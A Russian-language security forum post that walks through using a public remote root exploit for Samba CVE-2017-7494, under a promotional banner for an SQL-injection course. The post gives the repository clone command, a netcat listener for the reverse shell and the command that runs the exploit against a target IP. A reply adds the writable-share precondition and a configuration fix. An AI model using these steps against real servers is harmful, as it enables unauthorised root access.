• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Root Exploit Samba CVE-2017-7494

Хай, codeby:) В этой небольшой статье, я хочу показать root-exploit, предназначенный для проведения атаки на Samba – Server.

upload_2017-6-7_23-5-33.png


Samba — пакет программ, которые позволяют обращаться к сетевым дискам и принтерам на различных операционных системах по протоколу SMB/CIFS. Имеет клиентскую и серверную части. Является свободным программным обеспечением, выпущена под лицензией GPL.

Эксплоит, который мы рассмотрим – это удаленный root эксплойт для уязвимости SAMBA CVE-2017-7494.

Он разделен на две части:

· Во-первых, он компилирует полезную нагрузку под названием «implant.c» и генерирует библиотеку (libimplantx32.so или libimplantx64.so), которая изменяется на пользователя root, отделяется от родительского процесса и порождает обратную оболочку.

· Во-вторых, он находит доступную для записи долю в указанном целевом хосте, загружает библиотеку со случайным именем и пытается ее загрузить.

Пока цель уязвима и полезная нагрузка является правильной для целевой операционной системы и архитектуры, эксплойт на 100% надежен.

Получаем его с репозиториев Github.

> git clone https://github.com/joxeankoret/CVE-2017-7494

Тут же, есть его Ruby версия для Metasploit Framework - https://github.com/hdm/metasploit-f...les/exploits/linux/samba/is_known_pipename.rb

> cd CVE-2017-7494/

upload_2017-6-7_23-6-4.png


Использование:

> nc -p 31337 –l (
Ожидаем подключение на указанном порту)

Затем запускаем эксплойт против целевого хоста и ждем, пока он подключится к нашему Netcat:

> python cve_2017_7494.py -t target_ip

Если вы закрыли shell, вместо того чтобы снова запускать эксплойт, загружающий модуль и т.д. Вы можете просто задать путь к уже загруженному модулю. Предположим, что он был загружен в / shared / directory / как «module.so», вы должны запустить команду, как показано ниже:

> python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

Мой Samba сервер не эксплуатируется, поэтому результат предоставить не могу.

К тому же, есть issue, на странице разработчика на Github:

> https://github.com/joxeankoret/CVE-2017-7494/issues

upload_2017-6-7_23-7-23.png


На виртуалках, я сталкивался с подобной ошибкой. Возможно, корректнее будет работать Ruby эксплоит.

На этом откланяюсь, спасибо.
 
D

Dmitry88

Там еще есть условие, что у шары samba должна быть расшаренная папка на запись, причем расшаренная для anonymous user. Грубо говоря, для эксплуатации этой уязвимости больше подходят публичные файлопомойки.
ПС: Ну и если Вы являетесь владельцем такой файлопомойки, то не забудьте про защиту:
/etc/samba/smb.conf
добавьте в секцию [global] строку
nt pipe support = no

ну и перезагрузите службу smbd :)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!